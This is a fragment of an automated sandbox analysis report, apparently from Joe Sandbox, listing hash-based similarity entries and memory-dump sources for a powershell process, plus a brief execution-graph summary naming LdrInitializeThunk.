                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 920da16cc960ddf7c75cbcecf83f4ce0e2555ab12bbb0a4d2797a2a9bda66c71
                                                                            • Instruction ID: 4e2dd9bff0b4584ee251ddcfd16b1ab8ee20661f2dd99ea0e9bcf0b2954d242f
                                                                            • Opcode Fuzzy Hash: 920da16cc960ddf7c75cbcecf83f4ce0e2555ab12bbb0a4d2797a2a9bda66c71
                                                                            • Instruction Fuzzy Hash: 0D224E74B002149FD754DF58CD90FAABBA2EB89704F148499E909AF391CB72ED81CF91
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2800204230.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b782e914d0d2fc422817ff3ab9f1a08962b5a1f3c397ed951c17c63bcb2827fd
                                                                            • Instruction ID: 7677a022f97f8200216d599d3d447e56212126c9fb93689040fa26d634e64f00
                                                                            • Opcode Fuzzy Hash: b782e914d0d2fc422817ff3ab9f1a08962b5a1f3c397ed951c17c63bcb2827fd
                                                                            • Instruction Fuzzy Hash: 3D223974A002149FD764DF54C890FAABBB2FB85704F14C099E909AF392DB72ED85CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2803480626.0000000008D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D20000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_8d20000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6727066d80d226ad42030afb2081a29cb879aeb1d7e27327d8bf13b0a3ceecdf
                                                                            • Instruction ID: 94e91cae25fb2a7a68faf8a1420e25f15debe6e640455145e3970f8dd4a85482
                                                                            • Opcode Fuzzy Hash: 6727066d80d226ad42030afb2081a29cb879aeb1d7e27327d8bf13b0a3ceecdf
                                                                            • Instruction Fuzzy Hash: 53021B74A00219DFCF05CF98D884A9DBBB2FF88355F258259E904AB355D731ED92CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2803480626.0000000008D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D20000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_8d20000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c9cbe4dcbecddf9012e04c839a80c531317b09d25e4ffceb5b983a931d19a0bb
                                                                            • Instruction ID: 8ba6d8724b3c4d31ce5dd7cadf8d896fa9949230e741b8ec19094be4ff31eb89
                                                                            • Opcode Fuzzy Hash: c9cbe4dcbecddf9012e04c839a80c531317b09d25e4ffceb5b983a931d19a0bb
                                                                            • Instruction Fuzzy Hash: C4020974A00219DFDB05CF98C894AADFBB2FF48354F258259E914AB365C731ED92CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2803480626.0000000008D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D20000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_8d20000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 520e3e0997162e2891d608e97d4388d576658015fb6efeac6bfdfa5147abed0e
                                                                            • Instruction ID: 587f8a81222c646198ca9c6869c3fc287a21744231f2f18b05270fd83c22e0f2
                                                                            • Opcode Fuzzy Hash: 520e3e0997162e2891d608e97d4388d576658015fb6efeac6bfdfa5147abed0e
                                                                            • Instruction Fuzzy Hash: 54020B74A00219DFDF05DF98C484AAEBBB2FF49354F258259E904AB361C735EC82CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2800204230.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9e5a1bb92f74d2082bb541e6241e4e5e93b8d83295fb63d2903b6acb67f4d871
                                                                            • Instruction ID: 5fe528b1b5f21c8ffb28e00a996177cce7ed100770c5216b12b871de595e9383
                                                                            • Opcode Fuzzy Hash: 9e5a1bb92f74d2082bb541e6241e4e5e93b8d83295fb63d2903b6acb67f4d871
                                                                            • Instruction Fuzzy Hash: 79F17874E01244DFDB44DF59C990EA9BBB2EF89704F1580A9E905AF366C772EC42CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2800204230.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cdadfa5f26ebdba723a3f4683055a43197f726bfc1cc70093950b4d33b272d13
                                                                            • Instruction ID: 8ebf4a53b942a887d2441f3ffeccb63e08845e4409bc7001bfbb1325ec185035
                                                                            • Opcode Fuzzy Hash: cdadfa5f26ebdba723a3f4683055a43197f726bfc1cc70093950b4d33b272d13
                                                                            • Instruction Fuzzy Hash: 08E14774F002049FDB94CF98C950BAABBE2EB89314F15C069E905AF755DB72EC42CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2800204230.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ae4aa80a55dffc57ea9ccf5696c712a06f0f3c1f3325e34d9880fd5fd4a10fd2
                                                                            • Instruction ID: 4fb63771cd880437a5db04dec95d4adc6f5427bf26c41e79b4c1a8cb06ff4f03
                                                                            • Opcode Fuzzy Hash: ae4aa80a55dffc57ea9ccf5696c712a06f0f3c1f3325e34d9880fd5fd4a10fd2
                                                                            • Instruction Fuzzy Hash: D9F16B74E00219CFEB64DF54C990BAABBB2BB85304F1081A5E5196F741DB72ED81CF91
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2800204230.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: eec1c4b4fe2f6530ada3656211b3279709aaef0fc03be0740d4058fcb25e0c3c
                                                                            • Instruction ID: 74168aea59f0458239722c09994e24c9aed3f8ee098001a374f5750cee135ae5
                                                                            • Opcode Fuzzy Hash: eec1c4b4fe2f6530ada3656211b3279709aaef0fc03be0740d4058fcb25e0c3c
                                                                            • Instruction Fuzzy Hash: 89E13574E012449FDB94CF59C980EAABBF2EF89714F19C069E815AB351CB72EC41CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2803480626.0000000008D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D20000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_8d20000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1891ee9ef0ec5fcb59ff39d1092a7d2de07af983acd87d03680c99514881db52
                                                                            • Instruction ID: 0e321a7a10da69e5e4ca1331655454351eb33745202be88aad9a02d245890436
                                                                            • Opcode Fuzzy Hash: 1891ee9ef0ec5fcb59ff39d1092a7d2de07af983acd87d03680c99514881db52
                                                                            • Instruction Fuzzy Hash: 12E10774A00619EFDB15DF98C484AAEFBB2FF48354F248259E845AB355C731ED82CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2800204230.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3f033d7d141ac95d258af81a02fc47894377b7ff79935b04c7bd8e7bdb326fad
                                                                            • Instruction ID: 54b7d78a84770c8c7ca67f9d506b7ccf9400eea9de56c11d4bb8bc8c4a139d06
                                                                            • Opcode Fuzzy Hash: 3f033d7d141ac95d258af81a02fc47894377b7ff79935b04c7bd8e7bdb326fad
                                                                            • Instruction Fuzzy Hash: 2DB15734E00205DFDB54EF59C990FAEBBA2AB89304F24C069E9056F795DB71EC42CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2800204230.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ebd35d8b926e2221fc34248c93b4585e96c983e9ecff547ba7ca1d1ae999888e
                                                                            • Instruction ID: abc85b6074879a6edabeebfc3d19eb85cf72166407f300129681d28309ae7979
                                                                            • Opcode Fuzzy Hash: ebd35d8b926e2221fc34248c93b4585e96c983e9ecff547ba7ca1d1ae999888e
                                                                            • Instruction Fuzzy Hash: 86813737F002599FDB649F6988086BAFFE2AFC5610B14806BD506DB345EA32CD41C7E1
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2803480626.0000000008D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D20000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_8d20000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3f1a910b2dd4b1131cf7f79f9651639d96c98b589967bc5d9464da3eff6a858a
                                                                            • Instruction ID: aa2167cf7e5e69995cad8cdd8c2e685755363b628f8bac1ed3f96336c1183dc0
                                                                            • Opcode Fuzzy Hash: 3f1a910b2dd4b1131cf7f79f9651639d96c98b589967bc5d9464da3eff6a858a
                                                                            • Instruction Fuzzy Hash: C781AD30A0061ACFCB14DBA9C844AAEBBF2FFC8315F148569D405AB355DB34ED42CBA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2800204230.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 99852804c835ab89968f83a011be1b524de70d5ab5221f21d92b78a5bdd30e23
                                                                            • Instruction ID: e08222a6fe8f8a5fab6575af23e45d5a1229ac8948be8028c93d5c4a8c17bf79
                                                                            • Opcode Fuzzy Hash: 99852804c835ab89968f83a011be1b524de70d5ab5221f21d92b78a5bdd30e23
                                                                            • Instruction Fuzzy Hash: 6D717F34E00205DFDB54DF98C591AAEBBB2BF89390F188069D825AF755DB32DC41CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2800204230.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8107869dc45c4accd4f46bfa8f7c8f237612ce7468db19a6761751caba2a2d0e
                                                                            • Instruction ID: 093e834442ecc76ad0cf486e17a408ed3922b9f420a47030d4c700a9b06b53c0
                                                                            • Opcode Fuzzy Hash: 8107869dc45c4accd4f46bfa8f7c8f237612ce7468db19a6761751caba2a2d0e
                                                                            • Instruction Fuzzy Hash: FB514532F043459FDB614BA99800B6ABFE6AFD1221F14C07FE645CB281DA35C845C7A1
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2800204230.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 56b1085a176ec2cc8e1d67be8fa73468fd3b9f7bfbb4ca6a53c26f32b18c716b
                                                                            • Instruction ID: 9b50b4e99e614c1234606a5b8d5f26a0cec0594cba955b7cc0a314d24e12bc95
                                                                            • Opcode Fuzzy Hash: 56b1085a176ec2cc8e1d67be8fa73468fd3b9f7bfbb4ca6a53c26f32b18c716b
                                                                            • Instruction Fuzzy Hash: 25617874E00205DFEB50DF94C491AAABFB2FF89390F188169D825AB751D732E841CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2803480626.0000000008D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D20000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_8d20000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d07fcfdb88b950663cade583b6b1638e0736b81681e9c2c60e9232b9010a5727
                                                                            • Instruction ID: 67d8863b3509f1d125da76c477a7b45a297cb82f86ec1a0929264782a5c4d85e
                                                                            • Opcode Fuzzy Hash: d07fcfdb88b950663cade583b6b1638e0736b81681e9c2c60e9232b9010a5727
                                                                            • Instruction Fuzzy Hash: 10512874A04619DFCB14CF98C8919AEFBB2FF88315B248218E915A73A4C735EC52CF94
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2800204230.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9020afa19a8e8290408f0f395d4fae2c8bde1b27b09320f53151b58702f4ef4e
                                                                            • Instruction ID: 12f72ee74f3900608748a221db6e88d490494f594b3e767902967e86a8d9c8fe
                                                                            • Opcode Fuzzy Hash: 9020afa19a8e8290408f0f395d4fae2c8bde1b27b09320f53151b58702f4ef4e
                                                                            • Instruction Fuzzy Hash: 52417072F002158FE7509BF89851AAEBF96AFD5254B14846AD6018F751FA32CF02C3A2
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2803480626.0000000008D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D20000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_8d20000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f7099c005d7a8b1027cad9c93fb832858ce8ff2f123542bcae08321099a5afc5
                                                                            • Instruction ID: f672fa30469b7ad3fb4633d3b20102ca4d76dfa510fa19d1c538553b091e8ecb
                                                                            • Opcode Fuzzy Hash: f7099c005d7a8b1027cad9c93fb832858ce8ff2f123542bcae08321099a5afc5
                                                                            • Instruction Fuzzy Hash: E3519F70A04245DFCB06CF68C8909AEBBF2FF49354B258299E905EB361C735AC52CF90
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2803480626.0000000008D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D20000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_8d20000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e30039935f669f612e58e2c50768b6667a51adbb2b3b9d1b5228efb636641a60
                                                                            • Instruction ID: a6d88843395e29ca756664bbba71023fa167effef3031acce404810aead66996
                                                                            • Opcode Fuzzy Hash: e30039935f669f612e58e2c50768b6667a51adbb2b3b9d1b5228efb636641a60
                                                                            • Instruction Fuzzy Hash: FD510774A04619CFCB15CF98C890AAEF7B2FF88315F248658E915A73A4C335EC52CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2803480626.0000000008D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D20000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_8d20000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 18b95957a092684f0b55c676dd7ddade8628efe8e02dcc5d2c6311f59fabbb84
                                                                            • Instruction ID: 0875f00194c762abdb95d57f6e63791fb125ce2c2103d6ec3b4c32e45fb60223
                                                                            • Opcode Fuzzy Hash: 18b95957a092684f0b55c676dd7ddade8628efe8e02dcc5d2c6311f59fabbb84
                                                                            • Instruction Fuzzy Hash: 25510974A04619DFCB15CF98C890AAEF7B2FF88315B248258E915A73A4D735EC52CF90
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2800204230.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bc229459ed81a58386aa856513c4db9e012ab8ba523fcdda684e32a9e662ea00
                                                                            • Instruction ID: 7028b863916d352a06726bd3d5e0aa1e8442a78b1bb785243de8c9fa52e6fb54
                                                                            • Opcode Fuzzy Hash: bc229459ed81a58386aa856513c4db9e012ab8ba523fcdda684e32a9e662ea00
                                                                            • Instruction Fuzzy Hash: 7F314C33F422168FEBA59E79586037EBB95ABC5614B24407AC542CF385EE75C842C392
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2803480626.0000000008D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D20000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_8d20000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5c7e52dc2d24029d6613091085727c18f3f232b26e1b7b059ce730214fb3aac2
                                                                            • Instruction ID: ab4029029901cf606730478b6f360f12cee082301c232bb87bda4dba2ab8e040
                                                                            • Opcode Fuzzy Hash: 5c7e52dc2d24029d6613091085727c18f3f232b26e1b7b059ce730214fb3aac2
                                                                            • Instruction Fuzzy Hash: 12411674A00119CFCB05CF98C994AAEF7B2FF98324B258259E915AB3A4C735ED51CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2803480626.0000000008D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D20000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_8d20000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3cfc51f5dcfd78bfc980c6b1e8646956be61e53301d85937d84139566e451eaa
                                                                            • Instruction ID: 960c8336fe3985b65317b962ba54847b6a0b9864c5914c0b00dc10f3f5f683ae
                                                                            • Opcode Fuzzy Hash: 3cfc51f5dcfd78bfc980c6b1e8646956be61e53301d85937d84139566e451eaa
                                                                            • Instruction Fuzzy Hash: B0411674A01219DFCB05CF9CC9819AEB7B2FF88324B248259E914E73A4D331ED41CB94
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2800204230.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a5749f13cbe4aacb4aacdc8c75f4c2b3ca4ac3cd28331b6374e6fb920fd7e3e6
                                                                            • Instruction ID: 239c7c058b55526e9d10d3bdf24cca596f0c87462305dde313e5a6b5e9e41f96
                                                                            • Opcode Fuzzy Hash: a5749f13cbe4aacb4aacdc8c75f4c2b3ca4ac3cd28331b6374e6fb920fd7e3e6
                                                                            • Instruction Fuzzy Hash: 3F318D34B00214ABE714AB65C854FBE7AA3ABC5744F248028E9117F791CE76DC42CBA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2800204230.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: af34323d5c17ea7f4c4e82f80bed97295b955d30ba32f0cb4e0c377aa85c34fa
                                                                            • Instruction ID: 2b255809bfcd1f0035e03eca787545871f7d9bacca454a073b0bcd7de06979da
                                                                            • Opcode Fuzzy Hash: af34323d5c17ea7f4c4e82f80bed97295b955d30ba32f0cb4e0c377aa85c34fa
                                                                            • Instruction Fuzzy Hash: 7C318B36F103518FDB51EB3588607BABF929BC2291F1840BAD5168B780EF35CC51C7A1
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2800204230.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5cb7138a425e9a88781b137d2bc319ebb18f81d0b5256de6cd3eb354b2496d7d
                                                                            • Instruction ID: 706c170fe8bcb90f650652ad50fe4d4d9d9de40bcafe525bf9abbd8ada254f14
                                                                            • Opcode Fuzzy Hash: 5cb7138a425e9a88781b137d2bc319ebb18f81d0b5256de6cd3eb354b2496d7d
                                                                            • Instruction Fuzzy Hash: EC21F932B003569BEBB49E6A9C40B37BAD67BC4615F24842FED15CB386DD75C841C361
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2800204230.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fa203cda72dbfbd7b962413faaf46c158ecfe9f75bf0ced166b5fc4a54cb3c24
                                                                            • Instruction ID: c9b8ae03db8226d1dcc8f533a75deefa7ed31bf3695a9c7086959933da17d39d
                                                                            • Opcode Fuzzy Hash: fa203cda72dbfbd7b962413faaf46c158ecfe9f75bf0ced166b5fc4a54cb3c24
                                                                            • Instruction Fuzzy Hash: 41219831B083956FEB208A760C12BB27FE66FC2604F28442BE540CB2C2D925C844E371
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2803480626.0000000008D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D20000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_8d20000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 870422356ac134e9ac87043a1b10b876ac29b96e84baba5c3ee3cfbb9591e4d2
                                                                            • Instruction ID: 91ec687977209ed0f9ea4dff9605d3099ee53f12348b2a3a5d91861fa8ad7975
                                                                            • Opcode Fuzzy Hash: 870422356ac134e9ac87043a1b10b876ac29b96e84baba5c3ee3cfbb9591e4d2
                                                                            • Instruction Fuzzy Hash: B1312774A00609DFCB14CF98C580AAAFBF2FF88324B248258D559A7755C332EC81CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2800204230.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 061e52c4d99bf371f5a7367d766f8e3eef3f66bc757c57fe8e4526b241b89dbf
                                                                            • Instruction ID: b526a5858105c55d0efd64f3b4c094ff44db4107edcc29c3f8a26d3ae5c6f738
                                                                            • Opcode Fuzzy Hash: 061e52c4d99bf371f5a7367d766f8e3eef3f66bc757c57fe8e4526b241b89dbf
                                                                            • Instruction Fuzzy Hash: B4110332B083955BEB718E268D40F72BFE66FC2614F28405BAD558B297D969C844C3B2
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2800204230.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 966430885d0d7fd8f11bedc2b39aa74ed4f7db3744a30f1e877a38804c3a7376
                                                                            • Instruction ID: ebf0067cc6342568860f507d01ca911a9b3ff0f5ac9b1467588f7eac4465eca9
                                                                            • Opcode Fuzzy Hash: 966430885d0d7fd8f11bedc2b39aa74ed4f7db3744a30f1e877a38804c3a7376
                                                                            • Instruction Fuzzy Hash: 58213137E00B159FCBA09F29894817AFFB5EF88A00B25406ADC09E3205E730DD08CBE5
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2800204230.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6fe0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 17d28642b73489c5da7828d3bec68bd2a04c8ed56c0982f2982b8a09e74aa721
                                                                            • Instruction ID: 37c50725aaaa8fab697fa776b53d2424485ad4bb2768fa264cd3a7d59573714c
                                                                            • Opcode Fuzzy Hash: 17d28642b73489c5da7828d3bec68bd2a04c8ed56c0982f2982b8a09e74aa721
                                                                            • Instruction Fuzzy Hash: 5511D037E00A25DF8BA49F5989481AAFFF5FF48A107254166DC18A7209E731ED08CBE4
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2803480626.0000000008D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D20000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_8d20000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 314f4297876abd81fcc6fc7abd21973368d5e24c5f60cc83f0d56b0cffe0cd88
                                                                            • Instruction ID: 62849ca7649409a3c6827acae9c223379ea50d329c287220b551a176d52ae9eb
                                                                            • Opcode Fuzzy Hash: 314f4297876abd81fcc6fc7abd21973368d5e24c5f60cc83f0d56b0cffe0cd88
                                                                            • Instruction Fuzzy Hash: 20E02B30E00209DFCB10EB9AE8459EEB7B9FF80360F404168E01497341DB385D438BE5
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2803480626.0000000008D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D20000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_8d20000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 346b41d67d1c8e555f38c753d524ebe4d6dad68c2828f316666d1f1378c66d4c
                                                                            • Instruction ID: 86bb5cfd757673a19ffd0a03a312ab7296a15a53e26bbd4ff695ccc802f815c5
                                                                            • Opcode Fuzzy Hash: 346b41d67d1c8e555f38c753d524ebe4d6dad68c2828f316666d1f1378c66d4c
                                                                            • Instruction Fuzzy Hash: F8E02B75E482498FC741EBE4E4040FC7B21FF4625071186A6D455D7262D9295C078751

                                                                            Execution Graph

                                                                            Execution Coverage:0%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:100%
                                                                            Total number of Nodes:1
                                                                            Total number of Limit Nodes:0
                                                                            execution_graph 81385 1f7e2b60 LdrInitializeThunk

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 3 1f7e35c0-1f7e35cc LdrInitializeThunk
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
